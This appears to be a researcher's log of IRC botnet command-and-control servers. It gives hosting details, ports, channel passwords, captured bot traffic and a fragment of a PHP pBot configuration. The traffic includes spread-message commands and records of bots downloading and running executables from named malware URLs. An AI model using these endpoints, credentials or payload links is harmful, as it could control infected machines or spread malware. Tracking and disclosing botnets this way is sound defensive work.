38.99.168.199 (botnet hosted in United States Washington Psinet Inc)

Remote Host  Port Number
38.99.168.199  6667

NICK New[TeSlA|USA|1244024|XP]
USER 5224266 "" "lol" :5224266
NICK 3930
NICK [TeSlA|USA|1244024|XP]
USER 5695418 "" "lol" :5695418
NICK 3993

Info about hosting: http://whois.domaintools.com/38.99.168.199

ryan1918.has.zero-security.org (botnet hosted in Netherlands Amsterdam As29073 Ecatel Ltd)

Remote Host  Port Number
213.251.170.52  80
89.248.168.231  6869  PASS ngrBot

PRIVMSG #ng# :[HTTP]: Updated HTTP spread message to "visit http://goo.gl/o269r"
NICK n{US|XPa}kffoslr
USER kffoslr 0 0 :kffoslr
JOIN #ng# ngrBot
PRIVMSG #ng# :[MSN]: Updated MSN spread interval to "3"
PRIVMSG #ng# :[HTTP]: Updated HTTP spread interval to "3"
PRIVMSG #ng# :[MSN]: Updated MSN spread message

178.162.243.248 (botnet hosted in Germany Idealhosting Managed Servers)

Remote Host  Port Number
178.162.243.248  6667
178.162.243.248  8053
178.162.244.176  80
208.64.178.140  80
217.195.203.197  80
46.45.138.126  80
82.151.139.103  80
82.151.139.109  80

MODE #Oyun
MODE #Sohbet
MODE #MuhabbeT
NICK mIRCTurK113395
USER mIRCTurk "" "Irc.mIRCTurkk.CoM" : e mIRC Www.mircturkk.Com
NOTICE IRC : VERSION mIRC v6.03 Khaled Mardam-Bey
JOIN #Radyo,#yarisma,#kelime,#Oyun,#Sohbet,#MuhabbeT
MODE mIRCTurK113395 +i
MODE #Radyo
PONG :irc.miRCTurkk.com
MODE #yarisma

178.211.56.102 (botnet hosted in Turkey Radore Hosting Telekomunikasyon Hizmetleri San. Ve Tic. Ltd. Sti)

178.211.56.102:80

PASS owned
PASS owned
USER [XP]sixfecu [XP]sixfecu [XP]sixfecu :[XP]sixfecu
NICK [XP]sixfecu
:irc.dal.net NOTICE AUTH :*** Looking up your hostname...
:irc.dal.net NOTICE AUTH :*** Found your hostname (cached)
:irc.dal.net 001 [XP]sixfecu
:irc.dal.net 002 [XP]sixfecu : M0dded by uNkn0wn Crew
:irc.dal.net 003 [XP]sixfecu
:irc.dal.net 004 [XP]sixfecu : www.uNkn0wn.eu – iD@uNkn0wn.eu
:irc.dal.net 005 [XP]sixfecu
:irc.dal.net 005 [XP]sixfecu

122.155.8.162 (botnet hosted in Thailand Bangkok Cat Telecom Data Comm. Dept Idc Office)

Around 1k Linux bots inside.

class pBot {
    var $config = array("server"=>"122.155.8.162:3306",
        "port"=>"3306",
        "pass"=>"",
        "prefix"=>"EtexBOT",
        "maxrand"=>"6",
        "chan"=>"#babi123",
        "chan2"=>"#",
        "key"=>"",
        "modes"=>"+p",
        "password"=>"lol123",
        "trigger"=>".",

snk channel inside; that ruski lamer is everywhere lol

Info about hosting: http://whois.domaintools.com/122.155.8.162

210.170.62.106 (botnet hosted in Japan Rcp Co Ltd)

210.170.62.106:2345

Nick: New[AUT|00|P|19076]
Username: XP-1227
Joined Channel: #!loco!
Channel Topic for Channel #!loco!: "D http://urlcut.me/images93663?="
Private Message to Channel #!loco!: "[M]: Thread Activated: Sending Message With Email."
Private Message to Channel #!loco!: "[M]: Thread Disabled."
Private Message to User New[AUT|00|P|19076]: ".hp http://domredi.com/1/"

Info about hosting: http://whois.domaintools.com/210.170.62.106

75.102.22.40 (botnet hosted in 100mbps.ru)

Remote Host  Port Number
204.0.5.51  80
63.135.80.224  80
63.135.80.46  80
75.102.22.40  1866  PASS xxx

MODE NEW-[USA|00|P|41019] -ix
JOIN #!high! test
PONG 22
MOTD
NICK NEW-[USA|00|P|41019]
USER XP-6548 * 0 :COMPUTERNAME

Info about hosting: http://whois.domaintools.com/75.102.22.40

dns.photomarket.me (ngr bot hosted in Latvia Workstone Corporation)

Remote Host  Port Number
194.247.48.62  1234  PASS priv9
213.251.170.52  80
64.62.181.43  80
66.197.139.152  80

PRIVMSG #ngr :[Ruskill]: Removing "C:\WINDOWS\system32\drwtsn32.exe" at reboot
PRIVMSG #ngr :[d="http://datapimp.fileave.com/setup1.exe" s="129024 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\2.tmp"
NICK n{US|XP}rdhulwp
USER rdhulwp 0 0 :rdhulwp
JOIN #ngr
HELO
PRIVMSG #ngr :[d="http://mediamarkinc.in/install.52145.exe" s="73728 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.tmp"
PRIVMSG #ngr